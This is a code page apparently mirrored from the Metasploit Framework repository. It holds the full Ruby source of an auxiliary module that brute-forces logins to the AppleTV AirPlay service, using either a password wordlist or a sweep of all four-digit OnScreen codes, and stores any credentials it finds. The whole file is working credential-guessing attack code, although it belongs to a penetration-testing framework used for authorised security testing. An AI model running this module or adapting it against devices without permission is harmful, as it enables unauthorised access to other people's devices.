Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/appletv_login.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/credential_collection'

7
require 'metasploit/framework/login_scanner/http'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::Report

12
  include Msf::Auxiliary::AuthBrute

13
  include Msf::Auxiliary::Scanner

14


15
  def initialize

16
    super(

17
      'Name' => 'AppleTV AirPlay Login Utility',

18
      'Description' => %q(

19
        This module attempts to authenticate to an AppleTV service with

20
        the username, 'AirPlay'.  The device has two different access control

21
        modes: OnScreen and Password. The difference between the two is the

22
        password in OnScreen mode is numeric-only and four digits long, which

23
        means when this option is enabled, this option, the module will make

24
        sure to cover all of them - from 0000 to 9999.  The Password mode is

25
        more complex, therefore the usual online bruteforce strategies apply.

26
      ),

27
      'Author' => [

28
        '0a29406d9794e4f9b30b3c5d6702c708', # Original

29
        'thelightcosine' # LoginScanner conversion help

30
      ],

31
      'License' => MSF_LICENSE,

32
      'References' => [

33
        ['URL', 'http://nto.github.io/AirPlay.html']

34
      ],

35
      'DefaultOptions' => {

36
        'RPORT' => 7000, # AppleTV's server

37
        'STOP_ON_SUCCESS' => true # There's only one password with the same username

38
      }

39
    )

40


41
    register_options(

42
      [

43
        OptBool.new('Onscreen', [false, 'Enable if AppleTV is using the Onscreen access control', false]),

44
        OptPath.new('PASS_FILE', [

45
          false,

46
          'File containing passwords, one per line',

47
          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')

48
        ])

49
      ]

50
    )

51


52
    deregister_options(

53
      'USERNAME', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING',

54
      'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',

55
      'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername'

56
    )

57
  end

58


59
  def run_host(ip)

60
    uri = "/stop"

61
    if datastore['PASS_FILE'] && !datastore['PASS_FILE'].empty?

62
      print_status("Attempting to login to #{uri} using password list")

63
      cred_collection = Metasploit::Framework::CredentialCollection.new(

64
        blank_passwords: datastore['BLANK_PASSWORDS'],

65
        pass_file: datastore['PASS_FILE'],

66
        username: 'AirPlay',

67
        user_as_pass: datastore['USER_AS_PASS']

68
      )

69
      cred_collection = prepend_db_passwords(cred_collection)

70
    else

71
      print_status("Attempting to login to #{uri} by 'Onscreen Code'")

72
      cred_collection = LockCodeCollection.new

73
    end

74


75
    scanner = Metasploit::Framework::LoginScanner::HTTP.new(

76
      configure_http_login_scanner(

77
        uri: "/stop",

78
        cred_details: cred_collection,

79
        stop_on_success: datastore['STOP_ON_SUCCESS'],

80
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

81
        connection_timeout: 5

82
      )

83
    )

84


85
    scanner.scan! do |result|

86
      credential_data = result.to_h

87
      credential_data.merge!(

88
        module_fullname: self.fullname,

89
        workspace_id: myworkspace_id,

90
        service_name: 'airplay'

91
      )

92
      case result.status

93
      when Metasploit::Model::Login::Status::SUCCESSFUL

94
        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"

95
        credential_core = create_credential(credential_data)

96
        credential_data[:core] = credential_core

97
        create_credential_login(credential_data)

98
        :next_user

99
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

100
        print_brute :level => :verror, :ip => ip, :msg => "Could not connect"

101
        invalidate_login(credential_data)

102
        :abort

103
      when Metasploit::Model::Login::Status::INCORRECT

104
        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"

105
        invalidate_login(credential_data)

106
      when Metasploit::Model::Login::Status::NO_AUTH_REQUIRED

107
        print_brute :level => :error, :ip => ip, :msg => "NO AUTH REQUIRED: '#{result.credential}'"

108
        break

109
      end

110
    end

111
  end

112


113
  # This class is just a faster way of doing our LockCode enumeration. We could just stick this into

114
  # a CredentialCollection, but since we have a pre-set range we iterate through, it is easier to do it

115
  # at runtime.

116
  class LockCodeCollection

117


118
    def each

119
      (0..9999).each do |pass|

120
        screen_code = Metasploit::Framework::Credential.new(public: 'AirPlay', private: pass.to_s.rjust(4, '0'), realm: nil, private_type: :password)

121
        yield screen_code

122
      end

123
    end

124
  end

125
end

126


127